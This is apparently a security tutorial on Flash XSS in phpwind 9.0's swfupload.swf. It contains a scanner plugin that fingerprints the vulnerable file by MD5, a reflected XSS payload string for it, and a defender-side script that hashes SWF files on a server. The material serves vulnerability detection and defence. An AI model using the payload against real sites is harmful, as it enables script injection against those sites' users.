
    Flash XSS


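    This class of XSS arises mainly from the interaction between Flash and JavaScript.

    Detection method: verify the hash of the Flash file (for example, its MD5).

    Example:

    phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS vulnerability

    Because a Flash file can be downloaded to the client, download the swf file directly and check its hash. According to the vulnerability details, the path of the swf file is: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf

    Sample plugin

    PHPWind 9.0 swfupload.swf Flash XSS

    Thanks to the plugin author: xyw55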

    #!/usr/bin/env python
    # coding:utf-8
    # @Date : 2015-06-28
    # @Author : xyw55 (xyw5255@163.com)
    '''
    phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS vulnerability PoC
    refer : http://wooyun.org/bugs/wooyun-2013-017731
    '''
    import hashlib

    # fingerprint, hackhttp and security_info are provided by the plugin
    # framework (imported from dummy when the plugin is run stand-alone).


    def assign(service, arg):
        # Only accept targets fingerprinted as phpwind
        if service == fingerprint.phpwind:
            return True, arg


    def audit(arg):
        # MD5 of the known-vulnerable swfupload.swf
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
        url = arg
        verify_url = url + file_path
        code, head, res, redirect_url, log = hackhttp.http(verify_url)
        if code == 200:
            md5_value = hashlib.md5(res).hexdigest()
            # Exact comparison; "in" on a string would also match substrings
            if md5_value == flash_md5:
                # Do not pass log in the info message
                security_info(url + ' phpwind Reflected XSS; payload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')


    if __name__ == '__main__':
        from dummy import *
        audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])
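
The same hash check can be run from the defender's side against a deployed web root, which also finds copies of the file stored under other paths or names. This is an added example, not part of the plugin or written by its author; the function names are hypothetical, and the only known-bad value is the MD5 given above.

```python
import hashlib
import os

# MD5 the page gives for the vulnerable phpwind 9.0 swfupload.swf.
KNOWN_VULNERABLE_MD5 = {"3a1c6cc728dddc258091a601f28a9c12"}

# SWF files start with one of these signatures (uncompressed, zlib, LZMA).
SWF_MAGIC = (b"FWS", b"CWS", b"ZWS")


def file_md5(path, chunk_size=65536):
    """Hash a file in chunks so large files are not read into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def is_swf(path):
    """Identify SWF content by signature, so renamed copies are still found."""
    try:
        with open(path, "rb") as fh:
            return fh.read(3) in SWF_MAGIC
    except OSError:
        return False


def find_vulnerable_swf(webroot, known_md5=KNOWN_VULNERABLE_MD5):
    """Return sorted paths (relative to webroot) of SWF files with a known-bad MD5."""
    known = {h.lower() for h in known_md5}
    hits = []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        for name in filenames:
            full = os.path.join(dirpath, name)
            if is_swf(full) and file_md5(full) in known:
                hits.append(os.path.relpath(full, webroot))
    return sorted(hits)


if __name__ == "__main__":
    import sys
    for hit in find_vulnerable_swf(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("known-vulnerable SWF:", hit)
```

A match means the deployed file is byte-identical to the vulnerable build; a rebuilt or modified swf will not match and needs a separate review.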